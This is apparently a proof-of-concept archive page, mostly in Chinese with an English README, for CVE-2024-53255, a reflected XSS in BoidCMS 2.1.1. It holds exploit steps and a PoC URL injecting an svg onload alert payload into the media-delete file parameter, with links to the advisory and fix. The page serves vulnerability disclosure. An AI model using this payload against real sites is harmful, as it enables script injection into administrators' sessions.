关联漏洞
标题:
BoidCMS 安全漏洞
(CVE-2024-53255)
描述:BoidCMS是BoidCMS开源的一个免费的开源平面文件 CMS,用于构建简单的网站和博客,使用 PHP 开发并使用 JSON 作为数据库。 BoidCMS 2.1.1及之前版本存在安全漏洞,该漏洞源于文件参数中的/admin?page=media端点存在反射型跨站脚本(XSS)漏洞,允许攻击者注入任意JavaScript代码。
描述
boid CMS 2.1.1 - reflected Cross-Site Scripting (XSS)
介绍
# CVE-2024-53255
boid CMS 2.1.1 - reflected Cross-Site Scripting (XSS)
# Description:
A reflected XSS vulnerability exists in the /admin?page=media endpoint in the file parameter, allowing an attacker to inject arbitrary JavaScript code
# Steps to exploit:
1- Login to the CMS and Navigate to the delete page (/admin?page=media).
2- Select any file to delete and intercept the request using a proxy tool.
3- Modify the file parameter in the intercepted request to:
```
<svg+onload%3dalert(document.domain)>
```
4 - Forward the modified request and the injected script will execute.
Proof of concept (Poc):
```
http://localhost/boidcms/admin?page=media&action=delete&file=<svg+onload%3dalert(document.domain)>&token=693b471d9ee886766b69fd0dab9d992cd7f0e1e483822b28b6e8bcde0cf502e4
```
For details:
https://nvd.nist.gov/vuln/detail/CVE-2024-53255
https://www.cve.org/CVERecord?id=CVE-2024-53255
https://github.com/BoidCMS/BoidCMS/commit/42f4d703a87f5199bbd701b3495a26c91b9cfab7
https://github.com/BoidCMS/BoidCMS/security/advisories/GHSA-7q7m-cgw8-px4r
文件快照
[4.0K] /data/pocs/d606f211b0d25e490e53c8e3256ca268bc638f61
└── [1.0K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。